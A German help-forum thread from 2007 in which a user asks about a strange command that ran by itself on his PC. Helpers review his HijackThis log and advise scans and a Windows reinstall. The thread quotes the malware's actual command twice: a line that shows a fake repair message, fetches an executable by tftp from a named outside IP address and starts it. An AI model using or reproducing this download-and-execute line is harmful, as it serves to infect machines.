[erledigt]komischer cmd befehl

[timlagezz]

huhu hab gerade so einen komischen befehl bei start--> ausführen drin gehabt

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 38.98.159.34 GET xnzmt.exe & start xnzmt&

was heißten das?

das ding hat sich selber ausgeführt und denn is nod32 mein virenprogramm angesprung und es verschoben...

öhm ja was ist das was macht das und wie krieg ichs weg^^?

 

[Mike]

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 38.98.159.34 GET xnzmt.exe & start xnzmt&

Wenn sich sowas von selbst in deine Konsole schreiben darf, dann solltest mal folgendes Überprüfen:

- Firewall aktiv
- Virenprogramm am neuesten Stand
- Servicepacks am neuesten Stand
- Router (falls vorhanden) Firewall checken
- falls WLAN - Verschlüselung und Passwort überprüfen (evtl. erneuern)

Welche Software wurde installiert bevor das Problem aufgetreten ist ??

Wegkriegen: Virenüberprüfung - NOD32 hats eh schon verschoben sollte also nicht so schlimm sein im Moment.

Poste mal einen HJT-Logfile (www.hijackthis.de) Download rechts oben im Link

Mike

 

[timlagezz]

also windoof firewall is an...
nod is auch up to date macht der ja alles allein..

hier der log


Logfile of HijackThis v1.99.1
Scan saved at 19:58:23, on 02.03.2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16414)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Programme\DU Meter\DUMeter.exe
C:\Programme\Eset\nod32kui.exe
C:\Programme\DAEMON Tools\daemon.exe
C:\Programme\ATI Technologies\ATI.ACE\CLI.EXE
C:\WINDOWS\system32\CmWatch.exe
C:\Programme\cFos\cFosDNT.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programme\MSN Messenger\MsnMsgr.Exe
C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE
C:\Programme\Messenger\msmsgs.exe
C:\Dokumente und Einstellungen\Daniel\Desktop\client\client.exe
C:\Programme\Ashampoo\Ashampoo Magical Defrag\bin\aDefragCtrl.exe
C:\Programme\Ashampoo\Ashampoo Magical Defrag\bin\aDefragService.exe
C:\Programme\Intel\IDU\awServ.exe
C:\Programme\Eset\nod32krn.exe
C:\Programme\No-IP\DUC20.exe
C:\Programme\CyberLink\Shared files\RichVideo.exe
C:\WINDOWS\system32\svchost.exe
C:\Programme\ATI Technologies\ATI.ACE\cli.exe
C:\WINDOWS\system32\vmnetdhcp.exe
C:\Programme\UltraVNC\winvnc.exe
C:\Programme\No-IP\DUC20.exe
C:\Programme\qip\qip.exe
C:\WINDOWS\system32\vmnat.exe
C:\Programme\FlashGet\flashget.exe
C:\Programme\uTorrent Extreme Leecher Edition\uTorrent v1.6\uTorrent Extreme LE (Report Seeder + Multi) v2.exe
C:\Programme\Mozilla Firefox\firefox.exe
C:\Dokumente und Einstellungen\Daniel\Desktop\hijackthis_199\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O2 - BHO: IeCatch5 Class - {2F364306-AA45-47B5-9F9D-39A8B94E7EF7} - C:\PROGRA~1\FlashGet\jccatch.dll
O2 - BHO: Idea2 SidebarBrowserMonitor Class - {45AD732C-2CE2-4666-B366-B2214AD57A49} - C:\Programme\Desktop Sidebar\sbhelp.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre1.5.0_09\bin\ssv.dll
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Programme\Gemeinsame Dateien\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: FlashFXP Helper for Internet Explorer - {E5A1691B-D188-4419-AD02-90002030B8EE} - C:\Programme\FlashFXP\IEFlash.dll
O2 - BHO: gFlash Class - {F156768E-81EF-470C-9057-481BA8380DBA} - C:\PROGRA~1\FlashGet\getflash.dll
O3 - Toolbar: FlashGet Bar - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\fgiebar.dll
O4 - HKLM\..\Run: [DU Meter] C:\Programme\DU Meter\DUMeter.exe
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [nod32kui] "C:\Programme\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [nod32upd] rundll32 "C:\Programme\Eset\fc_upd.dll",NOD32Ioctl
O4 - HKLM\..\Run: [DAEMON Tools] "C:\Programme\DAEMON Tools\daemon.exe" -lang 1033
O4 - HKLM\..\Run: [ATICCC] "C:\Programme\ATI Technologies\ATI.ACE\CLIStart.exe"
O4 - HKLM\..\Run: [SigmatelSysTrayApp] sttray.exe
O4 - HKLM\..\Run: [CmCardRun] C:\WINDOWS\system32\CmWatch.exe
O4 - HKLM\..\Run: [cFosDNT] C:\Programme\cFos\cFosDNT.exe
O4 - HKLM\..\Run: [CTFMon] C:\WINDOWS\system32\CTF\ctfmon.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Programme\K-Lite Codec Pack\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [MSConfig] C:\WINDOWS\PCHealth\HelpCtr\Binaries\MSConfig.exe /auto
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [msnmsgr] "C:\Programme\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [MSMSGS] "C:\Programme\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Uptime-Project] C:\Dokumente und Einstellungen\Daniel\Desktop\client\client.exe
O4 - Startup: Telefon- und Branchenbuch Frühjahr 2007 - Schnellstarter.lnk = E:\klicktel\KSTART32.EXE
O4 - Startup: Yahoo! Widget Engine.lnk = C:\Programme\Yahoo!\Yahoo! Widget Engine\YahooWidgetEngine.exe
O4 - Global Startup: Ashampoo Magical Defrag.lnk = C:\Programme\Ashampoo\Ashampoo Magical Defrag\bin\aDefragCtrl.exe
O8 - Extra context menu item: Alles mit FlashGet laden - C:\Programme\FlashGet\jc_all.htm
O8 - Extra context menu item: Mit FlashGet laden - C:\Programme\FlashGet\jc_link.htm
O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.5.0_09\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.5.0_09\bin\ssv.dll
O9 - Extra button: Subscribe in Desktop Sidebar - {09FE188B-6E85-479e-9411-51FB2220DF80} - C:\Programme\Desktop Sidebar\sbhelp.dll
O9 - Extra 'Tools' menuitem: Subscribe in Desktop Sidebar - {09FE188B-6E85-479e-9411-51FB2220DF80} - C:\Programme\Desktop Sidebar\sbhelp.dll
O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\flashget.exe
O9 - Extra 'Tools' menuitem: &FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\flashget.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe
O9 - Extra button: Klicke hier um das Projekt xp-AntiSpy zu unterstützen - {0e921e80-267a-42aa-aee4-60b9a1222a44} - C:\Programme\xp-AntiSpy\sponsoring\sponsor.html (HKCU)
O9 - Extra 'Tools' menuitem: Unterstützung für xp-AntiSpy - {0e921e80-267a-42aa-aee4-60b9a1222a44} - C:\Programme\xp-AntiSpy\sponsoring\sponsor.html (HKCU)
O11 - Options group: [INTERNATIONAL] International*
O16 - DPF: {00B71CFB-6864-4346-A978-C0A14556272C} (Checkers Class) - http://messenger.zone.msn.com/binary/msgrchkr.cab31267.cab
O16 - DPF: {14B87622-7E19-4EA8-93B3-97215F77A6BC} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab31267.cab
O16 - DPF: {2917297F-F02B-4B9D-81DF-494B6333150B} (Minesweeper Flags Class) - http://messenger.zone.msn.com/binary/MineSweeper.cab31267.cab
O16 - DPF: {5D6F45B3-9043-443D-A792-115447494D24} (UnoCtrl Class) - http://messenger.zone.msn.com/DE-DE/a-UNO1/GAME_UNO1.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1165308529358
O16 - DPF: {8E0D4DE5-3180-4024-A327-4DFAD1796A8D} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsClient.cab31267.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/activescan/as5free/asinst.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (ZoneIntro Class) - http://messenger.zone.msn.com/binary/ZIntro.cab53083.cab
O16 - DPF: {BFF1950D-B1B4-4AE8-B842-B2CCF06D9A1B} (Zylom Games Player) - http://game11.zylom.com/activex/zylomgamesplayer.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{2175517B-E2D9-4DBC-AEF1-80EB000398CE}: NameServer = 217.237.149.205 217.237.150.188
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\MSNMES~1\MSGRAP~1.DLL
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\MSNMES~1\MSGRAP~1.DLL
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\GEMEIN~1\Skype\SKYPE4~1.DLL
O23 - Service: AshampooDefragService - - C:\Programme\Ashampoo\Ashampoo Magical Defrag\bin\aDefragService.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: Admin Works Agent X8 (AWService) - OSA Technologies Inc., An Avocent Company - C:\Programme\Intel\IDU\awServ.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programme\Gemeinsame Dateien\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: Process Monitor (LVPrcSrv) - Logitech Inc. - c:\programme\gemeinsame dateien\logishrd\lvmvfm\LVPrcSrv.exe
O23 - Service: LVSrvLauncher - Logitech Inc. - C:\Programme\Gemeinsame Dateien\LogiShrd\SrvLnch\SrvLnch.exe
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Programme\Eset\nod32krn.exe
O23 - Service: NoIPDUCService - Vitalwerks LLC - C:\Programme\No-IP\DUC20.exe
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Programme\CyberLink\Shared files\RichVideo.exe
O23 - Service: ServiceLayer - Nokia. - C:\Programme\PC Connectivity Solution\ServiceLayer.exe
O23 - Service: VMware Authorization Service (VMAuthdService) - VMware, Inc. - N:\VMware Workstation\vmware-authd.exe
O23 - Service: VMware DHCP Service (VMnetDHCP) - VMware, Inc. - C:\WINDOWS\system32\vmnetdhcp.exe
O23 - Service: VMware Virtual Mount Manager Extended (vmount2) - VMware, Inc. - C:\Programme\Gemeinsame Dateien\VMware\VMware Virtual Image Editing\vmount2.exe
O23 - Service: VMware NAT Service - VMware, Inc. - C:\WINDOWS\system32\vmnat.exe
O23 - Service: XAMPP Service (XAMPP) - Unknown owner - C:\Programme\xampp\service.exe (file missing)

 

[Mike]

Dein HJT-Logfile ist "eigentlich" Sauber. Es läuft zwar viel Unsinniges - Solltest also deinen PC mal überprüfen, ob wirklich alles notwendig ist.

mit autoruns von Downloadbereich kannst du überprüfen, was der PC wirklich beim booten "anstellt" und bereinigen.

Du sollstest in diesem programm aber nur die LOGON-Sektion durchschauen, sonst kannst du dir zuviel löschen, was dir unbekannt ist.

Sollte keine weitere Meldung kommen, wird hoffentlich alles passen und NOD hat es bereinigt.
Solltest aber einen kompletten Systemscan mit NOD machen

 

[timlagezz]

hab das alles gemacht..
jetz kommt aber das...
%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 38.98.159.34 GET rzomrrk.exe & start rzomrrk&

 

[Mike]

Das klingt nicht gut - die Meldung selbst sagt mir nicht 100% etwas - allerdings sehe ich da eine IP-Adresse (siehe Bild) die mich nervös macht :

dein Rechner will tftp machen (Das ist ein einfacher Dateizugriff - nur lesen und schreiben).
Da ist was echt nicht in Ordnung.
Empfehle Reparaturinstallation bzw. Neuinstallation

Anleitung RepInstallation ...

 

[Office2007]

Die IP führt zu einer viagra-seite. alles formatieren, windows neu installieren

 

[Phraser]

Hey Mike, was hat es sich mit der Lokalisierung der IP auf sich?
Ist das verrlässlich? Wo geb ich das ein?

 

[Mike]

Hey Mike, was hat es sich mit der Lokalisierung der IP auf sich?
Ist das verrlässlich? Wo geb ich das ein?

Das ist ein Internetdienst
www.prelaunch24.com/locate_ip/

ist aber nicht immer zuverlässig. Allerdings kommt eine 38.98.x.x Adresse immer von "drüben"


DIESE Adresse kann das besser : http://www.hostip.info/

Your IP Address: 38.98.159.34
(guessed) Newton, MS, UNITED STATES

Mike

 

[BrandyJr]

Achtung, dabei handelt es sich DEFINITIV um einen Virus bzw. Trojaner!
(siehe Screenshot)

Und wenn dein PC das automatisch durchführt, dann solltest du alle Anti-Spywareprogramme, die es so gibt mal durchführen lassen.
Oder du installierst deinen PC einfach neu.

 

[Bullayer]

Festplattenpartitionen löschen, neu partitionieren, formatieren und Windows neu installieren ist wohl hier die schnellste Lösung.

 

[MvSt1234]

Aber auch die brutalste (Datenverlust...)

Lass Spybot S&D laufen und in jedem Fall den Teatimer aktivieren! Der verhindert unerlaubte / ungewollte Änderungen in der Registry.
Damit kannst Du evtl eine weitere Verbreitung des Trojaners verhindern.

Zusätzlich solltest Du den Befehl "sfc/ scannow" ausführen und schon mal Deine WinXP CD bereit halten.
Der Befehl sfc sorgt für eine Reparatur der Systemdateien und stellt diese bei Bedarf von CD wieder her.

Wenn Dein NOD nichts weiteres findet, lass nen anderes AV-Proggi zusätzlich mal drüberlaufen.


Viel Erfolg !

 

[Mike]

Lass Spybot S&D laufen und in jedem Fall den Teatimer aktivieren! Der verhindert unerlaubte / ungewollte Änderungen in der Registry.
Damit kannst Du evtl eine weitere Verbreitung des Trojaners verhindern.

Aber nur auf dem eigenen Rechner und entfernt nicht den Virus!

Zusätzlich solltest Du den Befehl "sfc/ scannow" ausführen und schon mal Deine WinXP CD bereit halten.
Der Befehl sfc sorgt für eine Reparatur der Systemdateien und stellt diese bei Bedarf von CD wieder her.

...entfernt aber nicht den Virus!

Aber auch die brutalste (Datenverlust...)

Wieso

- Datensicherung (kann ruhig ver"virt" sein)
- NEUinstallation
- VIRENPROGRAMM und Updates installieren
- Spybot&Destroy installieren (ohne Teatimer, sonst kann man die halben Programme nicht installieren)
- Servicepacks installieren
- DATENRÜCKSICHERUNG (Virus wird entfernt, da Virenprogramm richtig arbeitet)

Danach sollte eigentlich alles passen.

Am besten wäre natürlich vorher (vor der ganzen Aktion) einen OFFLINE-Virenüberprüfung z.B. mit einer bartPE-CD mit einem AV-Programm zu machen.

Mike